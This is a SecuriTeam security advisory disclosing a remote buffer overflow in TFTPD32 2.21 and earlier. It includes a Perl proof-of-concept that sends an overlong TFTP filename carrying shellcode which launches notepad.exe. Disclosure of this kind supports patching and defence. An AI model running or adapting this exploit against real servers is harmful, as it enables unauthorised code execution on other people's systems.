Advisory available at: http://www.securiteam.com/windowsntfocus/6C00C2061A.html TFTPD32 Buffer Overflow Vulnerability (Long filename) ------------------------------------------------------- SUMMARY <http://tftpd32.jounin.net> TFTPD32 is a Freeware TFTP server for Windows 9x/NT/XP. It provides an implementation of the TFTPv2 protocol (specified in the RFC 1350). A vulnerability in the product allows remote attackers to cause the product to execute arbitrary code. DETAILS Vulnerable systems: * TFTP32 version 2.21 and prior Immune systems: * TFTP32 version 2.50.2 Exploit: #!/usr/bin/perl #TFTP Server remote Buffer Overflow use IO::Socket; $host = "192.168.1.53"; $port = "69"; $data = "A"; #$buf .= "\x00\x02"; # Send ---- Choose one $buf .= "\x00\x01"; # Recieve $buf .= "A"; $num = "116"; $buf .= $data x $num; $buf .= "."; $num = "140"; # EIP section $buf .= $data x $num; $address = "\xFF\xFF\xFF\xFF"; $buf .= $address; $egg = "\xEB\x27\x8B\x34\x24\x33\xC9\x33\xD2\xB2"; $egg .= "\x0B\x03\xF2\x88\x0E\x2B\xF2\xB8\xAF\xA7"; $egg .= "\xE6\x77\xB1\x05\xB2\x04\x2B\xE2\x89\x0C"; $egg .= "\x24\x2B\xE2\x89\x34\x24\xFF\xD0\x90\xEB"; $egg .= "\xFD\xE8\xD4\xFF\xFF\xFF"; $egg .= "notepad.exe"; $egg .= "\x90\x90\x90\x90\x90\x90"; $buf .= $egg; $buf .= "\x00binary\x00"; $socket = IO::Socket::INET->new(Proto => "udp") or die "Socket error: $@\n"; $ipaddr = inet_aton($host) || $host; $portaddr = sockaddr_in($port, $ipaddr); send($socket, $buf, 0, $portaddr) == length($buf) or die "Can't send: $!\n"; print "Now, '$host' should open up a notepad\n"; ADDITIONAL INFORMATION The information has been provided by <mailto:expert (at) securiteam (dot) com [email concealed]> SecurITeam Experts. -- Aviram Jenik Beyond Security Ltd. http://www.BeyondSecurity.com http://www.SecuriTeam.com Know that you're safe: http://www.AutomatedScanning.com